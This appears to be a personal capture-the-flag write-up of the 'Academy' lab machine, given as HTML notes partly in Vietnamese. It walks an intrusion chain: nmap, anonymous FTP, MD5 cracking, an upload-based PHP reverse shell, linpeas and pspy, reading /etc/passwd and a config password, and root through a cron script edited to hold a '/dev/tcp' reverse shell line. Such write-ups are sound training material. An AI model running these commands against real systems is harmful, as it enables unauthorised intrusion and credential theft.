
    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Academy TCM - writeup</title>
        <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet">
        <link href="https://cdn.jsdelivr.net/npm/lightgallery.js/dist/css/lightgallery.min.css" rel="stylesheet">
        <link href="https://cdn.jsdelivr.net/npm/lg-thumbnail.js/dist/lg-thumbnail.min.css" rel="stylesheet">
        <!-- Add Pygments CSS for code highlighting -->
        <style>pre { line-height: 125%; }
td.linenos .normal { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
span.linenos { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
.highlight .hll { background-color: #ffffcc }
.highlight { background: #f8f8f8; }
.highlight .c { color: #3D7B7B; font-style: italic } /* Comment */
.highlight .err { border: 1px solid #FF0000 } /* Error */
.highlight .k { color: #008000; font-weight: bold } /* Keyword */
.highlight .o { color: #666666 } /* Operator */
.highlight .ch { color: #3D7B7B; font-style: italic } /* Comment.Hashbang */
.highlight .cm { color: #3D7B7B; font-style: italic } /* Comment.Multiline */
.highlight .cp { color: #9C6500 } /* Comment.Preproc */
.highlight .cpf { color: #3D7B7B; font-style: italic } /* Comment.PreprocFile */
.highlight .c1 { color: #3D7B7B; font-style: italic } /* Comment.Single */
.highlight .cs { color: #3D7B7B; font-style: italic } /* Comment.Special */
.highlight .gd { color: #A00000 } /* Generic.Deleted */
.highlight .ge { font-style: italic } /* Generic.Emph */
.highlight .gr { color: #E40000 } /* Generic.Error */
.highlight .gh { color: #000080; font-weight: bold } /* Generic.Heading */
.highlight .gi { color: #008400 } /* Generic.Inserted */
.highlight .go { color: #717171 } /* Generic.Output */
.highlight .gp { color: #000080; font-weight: bold } /* Generic.Prompt */
.highlight .gs { font-weight: bold } /* Generic.Strong */
.highlight .gu { color: #800080; font-weight: bold } /* Generic.Subheading */
.highlight .gt { color: #0044DD } /* Generic.Traceback */
.highlight .kc { color: #008000; font-weight: bold } /* Keyword.Constant */
.highlight .kd { color: #008000; font-weight: bold } /* Keyword.Declaration */
.highlight .kn { color: #008000; font-weight: bold } /* Keyword.Namespace */
.highlight .kp { color: #008000 } /* Keyword.Pseudo */
.highlight .kr { color: #008000; font-weight: bold } /* Keyword.Reserved */
.highlight .kt { color: #B00040 } /* Keyword.Type */
.highlight .m { color: #666666 } /* Literal.Number */
.highlight .s { color: #BA2121 } /* Literal.String */
.highlight .na { color: #687822 } /* Name.Attribute */
.highlight .nb { color: #008000 } /* Name.Builtin */
.highlight .nc { color: #0000FF; font-weight: bold } /* Name.Class */
.highlight .no { color: #880000 } /* Name.Constant */
.highlight .nd { color: #AA22FF } /* Name.Decorator */
.highlight .ni { color: #717171; font-weight: bold } /* Name.Entity */
.highlight .ne { color: #CB3F38; font-weight: bold } /* Name.Exception */
.highlight .nf { color: #0000FF } /* Name.Function */
.highlight .nl { color: #767600 } /* Name.Label */
.highlight .nn { color: #0000FF; font-weight: bold } /* Name.Namespace */
.highlight .nt { color: #008000; font-weight: bold } /* Name.Tag */
.highlight .nv { color: #19177C } /* Name.Variable */
.highlight .ow { color: #AA22FF; font-weight: bold } /* Operator.Word */
.highlight .w { color: #bbbbbb } /* Text.Whitespace */
.highlight .mb { color: #666666 } /* Literal.Number.Bin */
.highlight .mf { color: #666666 } /* Literal.Number.Float */
.highlight .mh { color: #666666 } /* Literal.Number.Hex */
.highlight .mi { color: #666666 } /* Literal.Number.Integer */
.highlight .mo { color: #666666 } /* Literal.Number.Oct */
.highlight .sa { color: #BA2121 } /* Literal.String.Affix */
.highlight .sb { color: #BA2121 } /* Literal.String.Backtick */
.highlight .sc { color: #BA2121 } /* Literal.String.Char */
.highlight .dl { color: #BA2121 } /* Literal.String.Delimiter */
.highlight .sd { color: #BA2121; font-style: italic } /* Literal.String.Doc */
.highlight .s2 { color: #BA2121 } /* Literal.String.Double */
.highlight .se { color: #AA5D1F; font-weight: bold } /* Literal.String.Escape */
.highlight .sh { color: #BA2121 } /* Literal.String.Heredoc */
.highlight .si { color: #A45A77; font-weight: bold } /* Literal.String.Interpol */
.highlight .sx { color: #008000 } /* Literal.String.Other */
.highlight .sr { color: #A45A77 } /* Literal.String.Regex */
.highlight .s1 { color: #BA2121 } /* Literal.String.Single */
.highlight .ss { color: #19177C } /* Literal.String.Symbol */
.highlight .bp { color: #008000 } /* Name.Builtin.Pseudo */
.highlight .fm { color: #0000FF } /* Name.Function.Magic */
.highlight .vc { color: #19177C } /* Name.Variable.Class */
.highlight .vg { color: #19177C } /* Name.Variable.Global */
.highlight .vi { color: #19177C } /* Name.Variable.Instance */
.highlight .vm { color: #19177C } /* Name.Variable.Magic */
.highlight .il { color: #666666 } /* Literal.Number.Integer.Long */</style>
        <style>
            /* Center the HTML file on the screen */
            body {
                display: flex;
                justify-content: center;
                align-items: center;
                height: 100vh;
                padding-top: 30px;
            }
            /* Make the display width of the HTML file smaller */
            .container {
                max-width: 42vw;
                margin: 0 auto;
                height: 100%
            }
            
            img {
                width: 80%;
            }
        </style>
        <script src="https://cdn.jsdelivr.net/npm/lightgallery.js/dist/js/lightgallery.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-thumbnail.js/dist/lg-thumbnail.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-zoom.js/dist/lg-zoom.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-fullscreen.js/dist/lg-fullscreen.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-share.js/dist/lg-share.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-autoplay.js/dist/lg-autoplay.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-rotate.js/dist/lg-rotate.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-flip.js/dist/lg-flip.min.js"></script>
        <script>
            window.onload = function() {
                const images = document.getElementsByTagName('img');
                const lightGalleryItems = [];
                for (let i = 0; i < images.length; i++) {
                    const img = images[i];
                    if (img.naturalWidth > 1000) {
                        if (window.innerWidth > 768) {
                            img.style.width = '110%';
                            img.style.transform = 'translateX(-4%)';
                        } else {
                            img.style.width = '100%';
                            img.style.transform = 'none';
                        }
                    }
                    lightGalleryItems.push({ src: img.src, thumb: img.src });
                    img.setAttribute('data-lg-idx', i);
                    img.addEventListener('click', function() {
                        lightGallery(img, {
                            dynamic: true,
                            dynamicEl: lightGalleryItems,
                            index: parseInt(img.getAttribute('data-lg-idx'))
                        });
                    });
                }
            };
        </script>
    </head>
    <body>
        <div class="container">
            <div class="row">
                <div class="col">
                    <h1 style="text-align:center; text-transform:uppercase; font-family: 'Playfair Display', serif; font-weight:700;"">Academy</h1>

<p>Tuesday, August 2, 2022</p>
<p>9:54 AM</p>
<p>nmap -A -p- -T4 192.168.1.8</p>
<p>Starting Nmap 7.92 (  ) at 2022-08-02 03:27 EDT</p>
<p>Nmap scan report for 192.168.1.8</p>
<p>Host is up (0.00049s latency).</p>
<p>Not shown: 65532 closed tcp ports (conn-refused)</p>
<p>PORT   STATE SERVICE VERSION</p>
<p>21/tcp open  ftp     vsftpd 3.0.3</p>
<p>| ftp-anon: Anonymous FTP login allowed (FTP code 230)</p>
<p>|_-rw-r--r--    1 1000     1000          776 May 30  2021 note.txt</p>
<p>| ftp-syst:</p>
<p>|   STAT:</p>
<p>| FTP server status:</p>
<p>|      Connected to ::ffff:192.168.1.6</p>
<p>|      Logged in as ftp</p>
<p>|      TYPE: ASCII</p>
<p>|      No session bandwidth limit</p>
<p>|      Session timeout in seconds is 300</p>
<p>|      Control connection is plain text</p>
<p>|      Data connections will be plain text</p>
<p>|      At session startup, client count was 3</p>
<p>|      vsFTPd 3.0.3 - secure, fast, stable</p>
<p>|_End of status</p>
<p>22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)</p>
<p>| ssh-hostkey:</p>
<p>|   2048 c7:44:58:86:90:fd:e4:de:5b:0d:bf:07:8d:05:5d:d7 (RSA)</p>
<p>|   256 78:ec:47:0f:0f:53:aa:a6:05:48:84:80:94:76:a6:23 (ECDSA)</p>
<p>|_  256 99:9c:39:11:dd:35:53:a0:29:11:20:c7:f8:bf:71:a4 (ED25519)</p>
<p>80/tcp open  http    Apache httpd 2.4.38 ((Debian))</p>
<p>|_http-title: Apache2 Debian Default Page: It works</p>
<p>|_http-server-header: Apache/2.4.38 (Debian)</p>
<p>Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel</p>
<p>Service detection performed. Please report any incorrect results at  .</p>
<p>Nmap done: 1 IP address (1 host up) scanned in 10.78 seconds</p>
<p>ftp 192.168.1.8</p>
<p>Connected to 192.168.1.8.</p>
<p>220 (vsFTPd 3.0.3)</p>
<p>Name (192.168.1.8:kali): anonymous</p>
<p>331 Please specify the password.</p>
<p>Password:</p>
<p>230 Login successful.</p>
<p>Remote system type is UNIX.</p>
<p>Using binary mode to transfer files.</p>
<p>ftp&gt; ls</p>
<p>229 Entering Extended Passive Mode (|||28420|)</p>
<p>150 Here comes the directory listing.</p>
<p>-rw-r--r--    1 1000     1000          776 May 30  2021 note.txt</p>
<p>226 Directory send OK.</p>
<p>ftp&gt; get note.txt</p>
<p>local: note.txt remote: note.txt</p>
<p>229 Entering Extended Passive Mode (|||5506|)</p>
<p>150 Opening BINARY mode data connection for note.txt (776 bytes).</p>
<p>100% |<strong><em>*</em></strong><strong><em>*</em></strong><strong><em>*</em></strong><strong><em>*</em></strong><strong><em>*</em></strong><strong><em>*</em></strong><strong><em>*</em></strong><strong><em>*</em></strong><strong><em>*</em></strong><strong><em>*</em></strong>|   776        1.23 MiB/s    00:00 ETA</p>
<p>226 Transfer complete.</p>
<p>776 bytes received in 00:00 (492.72 KiB/s)</p>
<p>cat note.txt</p>
<p>Hello Heath !</p>
<p>Grimmie has setup the test website for the new academy.</p>
<p>I told him not to use the same password everywhere, he will change it ASAP.</p>
<p>I couldn't create a user via the admin panel, so instead I inserted directly into the database with the following command:</p>
<p>INSERT INTO <code>students</code> (<code>StudentRegno</code>, <code>studentPhoto</code>, <code>password</code>, <code>studentName</code>, <code>pincode</code>, <code>session</code>, <code>department</code>, <code>semester</code>, <code>cgpa</code>, <code>creationdate</code>, <code>updationDate</code>) VALUES</p>
<p>('10201321', '', 'cd73502828457d15655bbd7a63fb0bc8', 'Rum Ham', '777777', '', '', '', '7.60', '2021-05-29 14:36:56', '');</p>
<p>The StudentRegno number is what you use for login.</p>
<p>Le me know what you think of this open-source project, it's from 2020 so it should be secure... right ?</p>
<p>We can always adapt it to our needs.</p>
<p>-jdelta</p>
<p>hash-identifier cd73502828457d15655bbd7a63fb0bc8</p>
<p>this is md5</p>
<p>hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt</p>
<p>cd73502828457d15655bbd7a63fb0bc8:student</p>
<p>dirb</p>
<p>or</p>
<p>ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u</p>
<p>academy                 [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 0ms]</p>
<p>phpmyadmin              [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 4ms]</p>
<p>[Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 6ms]</p>
<p>server-status           [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 7ms]</p>
<p>login to</p>
<p>username in note.txt: 10201321</p>
<p>pass: student</p>
<p>we have upload avatar form.</p>
<p>using php serverse shell</p>
<p>use linpeas to enum</p>
<p>python3 -m http.server 80</p>
<p>$ wget</p>
<p>--2022-08-02 04:16:12--</p>
<p>Connecting to 192.168.1.6:80... connected.</p>
<p>HTTP request sent, awaiting response... 200 OK</p>
<p>Length: 807167 (788K) [text/x-sh]</p>
<p>Saving to: 'linpeas.sh'</p>
<p>$ chmod +x linpeas.sh</p>
<p>$ ./linpeas.sh</p>
<p>some interested</p>
<ul>
<li>
<ul>
<li>
<ul>
<li>
<ul>
<li>
<ul>
<li>/home/grimmie/backup.sh</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<p>$ cat /etc/passwd</p>
<p>root:x:0:0:root:/root:/bin/bash</p>
<p>daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</p>
<p>bin:x:2:2:bin:/bin:/usr/sbin/nologin</p>
<p>sys:x:3:3:sys:/dev:/usr/sbin/nologin</p>
<p>sync:x:4:65534:sync:/bin:/bin/sync</p>
<p>games:x:5:60:games:/usr/games:/usr/sbin/nologin</p>
<p>man:x:6:12:man:/var/cache/man:/usr/sbin/nologin</p>
<p>lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin</p>
<p>mail:x:8:8:mail:/var/mail:/usr/sbin/nologin</p>
<p>uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin</p>
<p>proxy:x:13:13:proxy:/bin:/usr/sbin/nologin</p>
<p>www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin</p>
<p>backup:x:34:34:backup:/var/backups:/usr/sbin/nologin</p>
<p>list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin</p>
<p>irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin</p>
<p>gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin</p>
<p>nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin</p>
<p>_apt:x:100:65534::/nonexistent:/usr/sbin/nologin</p>
<p>systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin</p>
<p>systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin</p>
<p>systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin</p>
<p>messagebus:x:104:110::/nonexistent:/usr/sbin/nologin</p>
<p>sshd:x:105:65534::/run/sshd:/usr/sbin/nologin</p>
<p>systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin</p>
<p>mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false</p>
<p>ftp:x:107:114:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin</p>
<p>grimmie:x:1000:1000:administrator,,,:/home/grimmie:/bin/bash</p>
<p>$ cat /var/www/html/academy/includes/config.php</p>
<p>&lt;?php</p>
<p>$mysql_hostname = "localhost";</p>
<p>$mysql_user = "grimmie";</p>
<p>$mysql_password = "My_V3ryS3cur3_P4ss";</p>
<p>$mysql_database = "onlinecourse";</p>
<p>$bd = mysqli_connect($mysql_hostname, $mysql_user, $mysql_password, $mysql_database) or die("Could not connect database");</p>
<p>ssh to grimmie:My_V3ryS3cur3_P4ss</p>
<p>grimmie@academy:~$ sudo -l</p>
<p>-bash: sudo: command not found</p>
<p>grimmie@academy:~$ history</p>
<p>1  ls</p>
<p>2  pwd</p>
<p>3  nano backup.sh</p>
<p>4  whoami</p>
<p>5  sudo</p>
<p>6  sudo -l</p>
<p>7  history</p>
<p>grimmie@academy:~$ cd /home/grimmie/</p>
<p>grimmie@academy:~$ cat backup.sh</p>
<h1>!/bin/bash</h1>
<p>rm /tmp/backup.zip</p>
<p>zip -r /tmp/backup.zip /var/www/html/academy/includes</p>
<p>chmod 700 /tmp/backup.zip</p>
<p>grimmie@academy:~$ crontab -l</p>
<p>no crontab for grimmie</p>
<p>grimmie@academy:~$ crontab -u root -l</p>
<p>must be privileged to use -u</p>
<p>grimmie@academy:~$ crontab -e</p>
<p>no crontab for grimmie - using an empty one</p>
<p>Select an editor.  To change later, run 'select-editor'.</p>
<ol>
<li>
<p>/bin/nano        &lt;---- easiest</p>
</li>
<li>
<p>/usr/bin/vim.tiny</p>
</li>
</ol>
<p>Choose 1-2 [1]: 1</p>
<p>No modification made</p>
<p>grimmie@academy:~$ systemctl list-timers</p>
<p>NEXT                         LEFT          LAST                         PASSED       UNIT                         AC</p>
<p>Tue 2022-08-02 05:09:00 EDT  8min left     Tue 2022-08-02 04:39:01 EDT  21min ago    phpsessionclean.timer        ph</p>
<p>Tue 2022-08-02 06:41:35 EDT  1h 40min left Tue 2022-08-02 03:18:52 EDT  1h 42min ago apt-daily-upgrade.timer      ap</p>
<p>Tue 2022-08-02 06:48:12 EDT  1h 47min left Tue 2022-08-02 03:18:52 EDT  1h 42min ago apt-daily.timer              ap</p>
<p>Wed 2022-08-03 00:00:00 EDT  18h left      Tue 2022-08-02 03:18:52 EDT  1h 42min ago logrotate.timer              lo</p>
<p>Wed 2022-08-03 00:00:00 EDT  18h left      Tue 2022-08-02 03:18:52 EDT  1h 42min ago man-db.timer                 ma</p>
<p>Wed 2022-08-03 03:33:56 EDT  22h left      Tue 2022-08-02 03:33:56 EDT  1h 27min ago systemd-tmpfiles-clean.timer sy</p>
<p>6 timers listed.</p>
<p>Pass --all to see loaded but inactive timers, too.</p>
<p>grimmie@academy:~$ ps</p>
<p>PID TTY          TIME CMD</p>
<p>13778 pts/0    00:00:00 bash</p>
<p>14105 pts/0    00:00:00 ps</p>
<p>grimmie@academy:~$ wget</p>
<p>--2022-08-02 05:04:05--</p>
<p>Connecting to 192.168.1.6:80... connected.</p>
<p>HTTP request sent, awaiting response... 200 OK</p>
<p>Length: 3078592 (2.9M) [application/octet-stream]</p>
<p>Saving to: ‘pspy64’</p>
<p>pspy64                       100%[==============================================&gt;]   2.94M  --.-KB/s    in 0.05s</p>
<p>2022-08-02 05:04:05 (64.8 MB/s) - ‘pspy64’ saved [3078592/3078592]</p>
<p>grimmie@academy:~$ chmod +x pspy64</p>
<p>run pspy</p>
<p>2022/08/02 05:07:01 CMD: UID=0    PID=14166  | /bin/sh -c /home/grimmie/backup.sh</p>
<p>2022/08/02 05:07:01 CMD: UID=0    PID=14167  | /bin/bash /home/grimmie/backup.sh</p>
<p>file backup được tạo cronjob chạy hàng phút, đồng thời thay với sh</p>
<p>bây giờ sửa file backup để tạo reverse shell:</p>
<p>bash -i &gt;&amp; /dev/tcp/192.168.1.6/8080</p>
<p>trên máy tấn công:</p>
<p>nc -nvlp 8081</p>
<p>root@academy:~#</p>
<p>cat flag.txt</p>
<p>Congratz you rooted this box !</p>
<p>Looks like this CMS isn't so secure...</p>
<p>I hope you enjoyed it.</p>
<p>If you had any issue please let us know in the course discord.</p>
                </div>
            </div>
        </div>    
    </body>
    </html>
    <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
<style>

.copy-button {
  position: absolute;
  right: 5px ;
  top: 5px;
  border: transparent;
  background-color: transparent;
  padding: 2px 6px;
  cursor: pointer;
  font-size: 14px;
  color: #333;
  border-radius: 8px;

}

.copy-button:hover {
  background-color: #30363d; # Change this to a different color to create a hover effect
}
.material-icons{
  line-height:1.3;
  color: #7d8590;
}

pre {
  position: relative;
  # padding: 20px;
  border: 1px solid #e7ee7;
  overflow-x: auto; # Remove this line to disable horizontal scrolling
  font-size: 14px;
  line-height: 1.5;
  border-radius: 6px;
  margin-bottom: 20px;

  # Add these lines to set a fixed width for the code block and wrap long lines
  #width: 80%;
  white-space: pre-wrap; 
}

pre code {
  display: block;
  border-radius: 8px;
  background-color: #2d2d2d; # Change this to a different color to match the copy button background

}




@media only screen and (min-width: 280px) {
  img {
    width: 85%; /* Make image smaller on tablets and mobiles */
  }
}

@media only screen and (max-width: 768px) {
  img {
    width: 85%; /* Make image smaller on tablets and desktops */
  }
}

# @media (min-width: 576px) {
#   img {
#     max-width: 540px;
#   }
# }

# @media (min-width: 768px) {
#   img {
#     max-width: 720px;
#   }
# }



@media (min-width: 280px) {
  .container {
    max-width: 90%;
    margin: 0 auto;
    height: 100%;
  }
}

@media (min-width: 750px) {
  .container {
    max-width: 80%;
    margin: 0 auto;
    height: 100%;
  }
}



@media (min-width: 912px) {
  .container {
    max-width: 70%;
    margin: 0 auto;
    height: 100%;
  }
}

# @media (min-width: 1200px) {
#   .container {
#     max-width: 70%;
#     margin: 0 auto;
#     height: 100%;
#   }
# }

# @media (min-width: 576px) {
#   .container {
#     max-width: 540px;
#   }
# }

# @media (min-width: 768px) {
#   .container {
#     max-width: 620px;
#     margin: 0;
#   }
# }

# @media (min-width: 992px) {
#   .container {
#     max-width: 760px;
#   }
# }

@media (min-width: 1200px) {
  .container {
    max-width: 735px;
    margin: 0;
    height: 100%;
  }
}

# p { 
#   text-indent: 10px;
# }

h2 {
  font-size: 1.5rem;
}

h3 {
  font-size: 1.3rem;
}

# .container {
#   max-width: 100%; /* Set the container width to 100% */
#   padding-left: 15px; /* Add some padding to the left */
#   padding-right: 15px; /* Add some padding to the right */
# }


</style>
<script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/10.7.2/highlight.min.js"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.8.0/styles/atom-one-dark-reasonable.min.css">

<script>
  document.addEventListener('DOMContentLoaded', function() {
    var codeBlocks = document.querySelectorAll('pre code');
    codeBlocks.forEach(function(codeBlock) {
      var copyButton = document.createElement('button');
      copyButton.innerHTML = '<i class="material-icons">content_copy</i>';
      copyButton.classList.add('copy-button');
      codeBlock.parentNode.insertBefore(copyButton, codeBlock);

      copyButton.addEventListener('click', function() {
        var code = codeBlock.textContent;
        var textarea = document.createElement('textarea');
        textarea.textContent = code;
        document.body.appendChild(textarea);
        textarea.select();
        document.execCommand('copy');
        textarea.remove();
        copyButton.innerHTML = '<i class="material-icons">check</i>';
        setTimeout(function() {
          copyButton.innerHTML = '<i class="material-icons">content_copy</i>';
        }, 2000);
      });
    });

    // Initialize highlight.js for syntax highlighting
    hljs.initHighlightingOnLoad();
  });
</script>
